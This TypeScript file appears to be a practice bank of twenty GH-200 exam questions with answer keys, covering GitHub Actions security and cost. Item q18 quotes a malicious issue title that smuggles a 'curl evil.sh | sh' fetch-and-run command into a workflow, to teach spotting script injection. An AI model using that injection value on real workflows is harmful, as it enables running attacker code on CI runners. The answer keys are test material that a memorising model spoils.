import type { Question } from '../types';

/**
 * GH-200 domain 5 practice bank — Secure and optimize automation (20
 * questions). Environment protections, trustworthy actions, script
 * injection, the GITHUB_TOKEN versus PATs, OIDC federation, pinning,
 * usage policies, attestations, and cost optimization. Mix: 12 single,
 * 3 multi, 5 coding items (an OIDC and a permissions fill-in, injection
 * and over-broad-token spot-the-bugs, and a pinning ordering).
 */
export const questions: Question[] = [
  {
    id: 'gh200-d5-q01',
    cert: 'gh200',
    domainId: 'gh200-d5',
    subSkillId: 'd5-environments',
    kind: 'single',
    stem: 'A deploy to production must wait until two named engineers click approve in the run itself. What provides that gate?',
    options: [
      'A required reviewer configured on the production environment',
      'A branch protection rule on `main`',
      'A CODEOWNERS file listing the engineers',
      'A manual `workflow_dispatch` input',
    ],
    answerIndex: 0,
    explanation:
      'Environments carry protection rules: required reviewers pause any job referencing the environment until they approve or reject, right on the run page. Branch protection governs merges; the environment gate governs the deployment job.',
    docId: 'manage-environments',
  },
  {
    id: 'gh200-d5-q02',
    cert: 'gh200',
    domainId: 'gh200-d5',
    subSkillId: 'd5-environments',
    kind: 'single',
    stem: 'Which set describes what environment protection rules can enforce?',
    options: [
      'Required reviewers, a wait timer, and deploy-branch restrictions',
      'Required reviewers only',
      'Two-factor authentication and SSO',
      'Runner sizing and job timeouts',
    ],
    answerIndex: 0,
    explanation:
      'Protection rules cover who approves (reviewers), how long to pause (wait timer), and which branches may deploy to the environment — the levers of a controlled rollout. Authentication policy and runner capacity live elsewhere entirely.',
    docId: 'manage-environments',
  },
  {
    id: 'gh200-d5-q03',
    cert: 'gh200',
    domainId: 'gh200-d5',
    subSkillId: 'd5-trustworthy-actions',
    kind: 'single',
    stem: 'Choosing a third-party action from the Marketplace, which signal is the weakest basis for trust?',
    options: [
      'A verified publisher badge on the listing',
      'The repository’s issue tracker showing active maintenance',
      'The action’s star count alone',
      'Reading its source before first use',
    ],
    answerIndex: 2,
    explanation:
      'Stars measure popularity, not safety or upkeep — the exam point is that trust comes from verifiable signals: publisher verification, maintained source and issues, and your own read of what the code does with its permissions.',
    docId: 'github-marketplace',
  },
  {
    id: 'gh200-d5-q04',
    cert: 'gh200',
    domainId: 'gh200-d5',
    subSkillId: 'd5-script-injection',
    kind: 'single',
    stem: 'Which of these values must be treated as untrusted input to a workflow?',
    options: [
      'The commit SHA that triggered the run',
      'An issue title arriving through `github.event`',
      'The `runner.os` of the allocated machine',
      'The workflow file’s own `env:` block',
    ],
    answerIndex: 1,
    explanation:
      'Anything an outside contributor can author — issue titles, PR bodies, branch names — is attacker-controlled text that flows in through `github.event`. Platform-provided facts like the SHA or `runner.os`, and your own authored config, are the trusted side of that line.',
    docId: 'secure-use',
  },
  {
    id: 'gh200-d5-q05',
    cert: 'gh200',
    domainId: 'gh200-d5',
    subSkillId: 'd5-token-permissions',
    kind: 'single',
    stem: 'When is the `GITHUB_TOKEN` created, and when does it stop working?',
    options: [
      'It is minted fresh for each job and revoked when the job ends',
      'It is a permanent repository credential rotated yearly',
      'It exists from repository creation until deleted by an admin',
      'It is issued per workflow file and shared across its jobs',
    ],
    answerIndex: 0,
    explanation:
      'The token’s lifecycle is the job: generated before your steps run, scoped to that repository, and invalidated when the job finishes. That ephemerality is exactly why it beats a personal access token for in-workflow git and API work.',
    docId: 'github-token',
  },
  {
    id: 'gh200-d5-q06',
    cert: 'gh200',
    domainId: 'gh200-d5',
    subSkillId: 'd5-token-permissions',
    kind: 'single',
    stem: 'A security review asks for the least-privilege default across dozens of repositories. What is the recommended posture?',
    options: [
      'Keep broad read/write defaults for compatibility',
      'Set default workflow permissions to read-only, granting writes job by job',
      'Grant `write-all` on the workflows that need any write',
      'Store a classic PAT with full repo scope as an organization secret',
    ],
    answerIndex: 1,
    explanation:
      'Restrictive by default, expansive by exception: read-only tokens everywhere, and a `permissions:` block on the few jobs that write. A PAT in a secret is the anti-pattern — long-lived, broadly scoped, and copied into every run that reads it.',
    docId: 'secure-use',
  },
  {
    id: 'gh200-d5-q07',
    cert: 'gh200',
    domainId: 'gh200-d5',
    subSkillId: 'd5-token-permissions',
    kind: 'single',
    stem: 'A workflow must open pull requests against a different repository it does not own. What does that require?',
    options: [
      'The `GITHUB_TOKEN`, with `pull-requests: write`',
      'A personal access token (or GitHub App token) with rights on the target repository',
      'Nothing — any workflow can PR anywhere',
      'Forking the target repository first',
    ],
    answerIndex: 1,
    explanation:
      'The `GITHUB_TOKEN` is scoped to its own repository, so cross-repository work needs credentials that live where the permissions do: a PAT or a GitHub App token granted on the target. Widening the job token cannot reach across that boundary.',
    docId: 'github-token',
  },
  {
    id: 'gh200-d5-q08',
    cert: 'gh200',
    domainId: 'gh200-d5',
    subSkillId: 'd5-oidc',
    kind: 'single',
    stem: 'What does OIDC federation replace in a workflow that deploys to AWS?',
    options: [
      'The need for a `permissions:` block',
      'Long-lived cloud credentials stored as secrets',
      'The need for `actions/checkout`',
      'The runner itself',
    ],
    answerIndex: 1,
    explanation:
      'With OIDC, the job presents a short-lived signed token to the cloud’s trust configuration and receives scoped credentials — no access key sitting in a secret for years. The `id-token: write` permission and a trust relationship on the cloud side are what make it work.',
    docId: 'openid-connect',
  },
  {
    id: 'gh200-d5-q09',
    cert: 'gh200',
    domainId: 'gh200-d5',
    subSkillId: 'd5-pinning',
    kind: 'single',
    stem: 'Why do hardening guides tell you to reference third-party actions by full commit SHA rather than tag?',
    options: [
      'SHAs resolve faster on the runner',
      'Tags are mutable — they can be re-pointed at different code; a SHA cannot',
      'Tags are deprecated for actions',
      'SHAs unlock Marketplace verification',
    ],
    answerIndex: 1,
    explanation:
      'A tag or branch is a pointer someone can move, so `@v3` today is not a promise about tomorrow; a full commit SHA names exactly one immutable tree. Pinning is how you make a third-party dependency in your pipeline reviewable and stable.',
    docId: 'secure-use',
  },
  {
    id: 'gh200-d5-q10',
    cert: 'gh200',
    domainId: 'gh200-d5',
    subSkillId: 'd5-usage-policy',
    kind: 'single',
    stem: 'A repository administrator wants to limit which actions run in that one repository, below the organization’s ceiling. Can they?',
    options: [
      'No — repository settings cannot act below organization policy',
      'Yes — repository Actions settings can be more restrictive than the organization’s',
      'Yes — and more permissive too',
      'Only by disabling Actions in the repository',
    ],
    answerIndex: 1,
    explanation:
      'Policy flows downward: an organization sets the ceiling, and a repository may tighten below it with its own allow list. What a repository can never do is exceed the organization’s or enterprise’s allowance — restrictions compose, permissions do not.',
    docId: 'org-actions-policy',
  },
  {
    id: 'gh200-d5-q11',
    cert: 'gh200',
    domainId: 'gh200-d5',
    subSkillId: 'd5-attestations',
    kind: 'single',
    stem: 'What do artifact attestations add to a build artifact?',
    options: [
      'Encryption at rest in the artifact store',
      'Signed provenance — verifiable claims about how, where, and from what the artifact was built',
      'Longer default retention',
      'Automatic vulnerability scanning',
    ],
    answerIndex: 1,
    explanation:
      'An attestation is a signed statement bound to the artifact: where it was built, from which source, by which workflow. Consumers verify the signature chain instead of trusting the artifact’s travel story — the provenance idea behind SLSA.',
    docId: 'artifact-attestations',
  },
  {
    id: 'gh200-d5-q12',
    cert: 'gh200',
    domainId: 'gh200-d5',
    subSkillId: 'd5-cost-optimization',
    kind: 'single',
    stem: 'A monorepo’s CI is the biggest Actions line item. Which change most directly cuts billed minutes per run?',
    options: [
      'Caching restored dependencies so install steps stop repeating',
      'Renaming the workflow file',
      'Adding `continue-on-error` to slow steps',
      'Printing fewer log lines',
    ],
    answerIndex: 0,
    explanation:
      'Billed time is wall-clock on runners, and repeated dependency installs are usually the largest compressible chunk — a cache hit turns minutes into seconds. Log volume and file names do not bill; failing faster hides cost without saving it.',
    docId: 'dependency-caching',
  },
  {
    id: 'gh200-d5-q13',
    cert: 'gh200',
    domainId: 'gh200-d5',
    subSkillId: 'd5-environments',
    kind: 'multi',
    stem: 'Which statements about environments are true? Choose all that apply.',
    options: [
      'An environment can require reviewers before a job proceeds',
      'A job can read an environment’s secrets without referencing the environment',
      'Protection rules can restrict which branches deploy to the environment',
      'Every repository is created with a `production` environment',
      'Deployment history per environment is visible on its page',
    ],
    answerIndexes: [0, 2, 4],
    explanation:
      'Environments bundle three things: gates (reviewers), reach (secrets and protection scoped to jobs that name the environment), and a record (deployment history). They are created on demand, never by default, and never leak secrets upward.',
    docId: 'manage-environments',
  },
  {
    id: 'gh200-d5-q14',
    cert: 'gh200',
    domainId: 'gh200-d5',
    subSkillId: 'd5-token-permissions',
    kind: 'multi',
    stem: 'Which statements about the GITHUB_TOKEN are true? Choose all that apply.',
    options: [
      'It is created for each job and expires with it',
      'It works in any repository owned by your account',
      'The `permissions:` block can narrow it per workflow or job',
      'A personal access token is automatically safer',
      'Reaching another repository you do not own requires different credentials',
    ],
    answerIndexes: [0, 2, 4],
    explanation:
      'The job token is ephemeral, repo-scoped, and right-sizeable through `permissions:`. A PAT is neither automatically safer nor bound to one job — it is a longer-lived, broader credential, and cross-repo work is precisely where you cannot avoid one.',
    docId: 'github-token',
  },
  {
    id: 'gh200-d5-q15',
    cert: 'gh200',
    domainId: 'gh200-d5',
    subSkillId: 'd5-cost-optimization',
    kind: 'multi',
    stem: 'Which practices reduce Actions cost or duration? Choose all that apply.',
    options: [
      'Restoring dependency caches instead of reinstalling every run',
      'Shortening artifact retention to what audits actually need',
      'Cancelling superseded runs for the same ref with a concurrency group',
      'Choosing larger runners for every job regardless of workload',
      'Treating every OS as billed at the same per-minute rate',
    ],
    answerIndexes: [0, 1, 2],
    explanation:
      'Cheaper means less runner time and less stored data: caches shrink installs, shorter retention trims storage, and concurrency cancellation stops paying for runs the world no longer wants. Bigger machines and flat-rate assumptions move the bill the wrong way.',
    docId: 'billing-actions',
  },
  {
    id: 'gh200-d5-q16',
    cert: 'gh200',
    domainId: 'gh200-d5',
    subSkillId: 'd5-oidc',
    kind: 'fill',
    stem: 'Wire up cloud federation: grant the OIDC permission and take the role from storage.',
    codeTemplate:
      'name: Deploy to AWS\non: push\njobs:\n  deploy:\n    runs-on: ubuntu-latest\n    permissions:\n      id-token: ___\n      contents: read\n    steps:\n      - uses: aws-actions/configure-aws-credentials@v4\n        with:\n          role-to-assume: ${{ ___ }}\n          aws-region: us-east-1\n',
    blanks: [
      { answer: 'write', alternatives: [] },
      { answer: 'secrets.AWS_ROLE_ARN', alternatives: ['secrets.AWS_ROLE'] },
    ],
    explanation:
      'Federation needs exactly two things in the workflow: `id-token: write` so the job can mint OIDC tokens, and the cloud role to assume — stored as a secret and read through `${{ secrets.… }}`. The cloud side trusts the issuer; no keys ever change hands.',
    docId: 'openid-connect',
  },
  {
    id: 'gh200-d5-q17',
    cert: 'gh200',
    domainId: 'gh200-d5',
    subSkillId: 'd5-token-permissions',
    kind: 'fill',
    stem: 'The notes job reads the repository and writes pull-request metadata — nothing else. Grant exactly that.',
    codeTemplate:
      'name: Release notes\non: push\njobs:\n  notes:\n    runs-on: ubuntu-latest\n    permissions:\n      contents: read\n      pull-requests: ___\n    steps:\n      - run: ./gen-notes.sh\n',
    blanks: [{ answer: 'write', alternatives: [] }],
    explanation:
      'Granular permissions name each scope and its level: `contents: read` for the checkout side, `pull-requests: write` to label and comment. Least privilege is expressed per scope, not by reaching for `write-all` when one scope needs one verb.',
    docId: 'secure-use',
  },
  {
    id: 'gh200-d5-q18',
    cert: 'gh200',
    domainId: 'gh200-d5',
    subSkillId: 'd5-script-injection',
    kind: 'bug',
    stem: 'A malicious issue title of `"; curl evil.sh | sh #` should not be able to hijack this step — but as written it can. Click the vulnerable line.',
    codeLines: [
      'name: Triage bot',
      'on:',
      '  issues:',
      '    types: [opened]',
      'jobs:',
      '  comment:',
      '    runs-on: ubuntu-latest',
      '    steps:',
      '      - run: echo "Title: ${{ github.event.issue.title }}"',
    ],
    buggyLineIndex: 8,
    explanation:
      'Interpolating `github.event.*` straight into `run:` splices attacker text into the shell script itself. The safe shape passes it through an environment variable — `env: TITLE: ${{ github.event.issue.title }}` then `echo "Title: $TITLE"` — so the shell reads a value instead of executing prose.',
    docId: 'secure-use',
  },
  {
    id: 'gh200-d5-q19',
    cert: 'gh200',
    domainId: 'gh200-d5',
    subSkillId: 'd5-token-permissions',
    kind: 'bug',
    stem: 'Security review flags this job: it only reads code and runs a script, yet its token can change anything in the repository. Click the line to fix.',
    codeLines: [
      'name: Docs build',
      'on: push',
      'jobs:',
      '  build:',
      '    runs-on: ubuntu-latest',
      '    permissions: write-all',
      '    steps:',
      '      - uses: actions/checkout@v4',
      '      - run: ./build-docs.sh',
    ],
    buggyLineIndex: 5,
    explanation:
      '`write-all` hands the job every scope at full write for no reason — the fix is `contents: read`, or removing the block to inherit a restrictive default. Granting everything and hoping the job behaves is the posture least privilege exists to replace.',
    docId: 'secure-use',
  },
  {
    id: 'gh200-d5-q20',
    cert: 'gh200',
    domainId: 'gh200-d5',
    subSkillId: 'd5-pinning',
    kind: 'order',
    stem: 'Harden a workflow’s third-party actions. Put the steps in order.',
    items: [
      'Inventory every `uses:` line and where each action comes from',
      'Check each action’s repository for maintenance, issues, and release hygiene',
      'Resolve each referenced tag to its full commit SHA',
      'Replace the tag references with `owner/action@<sha>`',
      'Re-run the workflow and confirm the pinned refs still build',
    ],
    explanation:
      'Pin deliberately, not blindly: know what you use, judge whether you should, resolve each moving ref to the exact commit, swap the references, and prove the pipeline still runs. The SHA is the last step of judgment, not a substitute for it.',
    docId: 'secure-use',
  },
];
